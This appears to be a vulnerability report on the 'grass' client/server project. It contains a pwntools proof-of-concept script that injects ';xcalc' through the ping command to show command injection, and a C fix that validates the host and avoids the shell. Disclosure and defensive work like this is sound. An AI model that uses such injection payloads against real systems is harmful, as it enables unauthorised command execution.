I am able to open a calculator when executing the ping command.

Here's a PoC:

```python
'''
This script should be put in yannvonn/grass/ directory and run from there.
This script works on freshly restarted Kali Linux 64 bit VM.
Do not forget to make before running script.

Target: https://github.com/yannvon/grass
Exploit: Command Injection - Open calc through ping command

You can also run this by hand by doing:
make
./bin/server
./bin/client 127.0.0.1 1337
login u1
pass p1
ping wowmuchinject.com;xcalc
'''
from pwn import *

server_bin = './bin/server'
client_bin = './bin/client'
IP = "127.0.0.1"
PORT = "1337"
LOGIN = "login u1"
PASS = "pass p1"
CMD = "ping wowmuchinject;xcalc"

server = process(server_bin)
client = process([client_bin, IP, PORT])
client.sendline(LOGIN)
client.sendline(PASS)
client.sendline(CMD)
print("SERVER: {}".format(server.recvall()))
```
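A defensive counterpart to the PoC above, added here as an example and not taken from the yannvon/grass code base: it assumes the server hands the `ping` argument to a shell, and shows an allowlist check on the host plus a shell-free `execvp()` call. The function names `is_safe_ping_host`, `build_ping_argv` and `run_ping` are hypothetical.

```c
#include <ctype.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check for the ping argument: hostname or IPv4 characters only.
 * Rejects shell metacharacters (; | & $ ` space ...) and a leading '-',
 * which ping would otherwise parse as an option. */
int is_safe_ping_host(const char *host)
{
    size_t len = host ? strlen(host) : 0;
    if (len == 0 || len > 253 || host[0] == '-' || host[0] == '.')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!isalnum(c) && c != '.' && c != '-')
            return 0;
    }
    return 1;
}

/* Fill argv for execvp(); the host is a single argument, never shell text.
 * Returns 0 on success, -1 if the host fails validation. */
int build_ping_argv(const char *host, const char *argv[5])
{
    if (!is_safe_ping_host(host))
        return -1;
    argv[0] = "ping"; argv[1] = "-c"; argv[2] = "1";
    argv[3] = host;   argv[4] = NULL;
    return 0;
}

/* Run ping without a shell. Returns ping's exit status, or -1 on error. */
int run_ping(const char *host)
{
    const char *argv[5];
    int status;
    if (build_ping_argv(host, argv) != 0)
        return -1;                      /* rejected before any process starts */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execvp(argv[0], (char *const *)argv);
        _exit(127);                     /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With this shape the string from the PoC is refused by the validator, and even a value that passed would reach `ping` as one argv entry rather than as text a shell interprets.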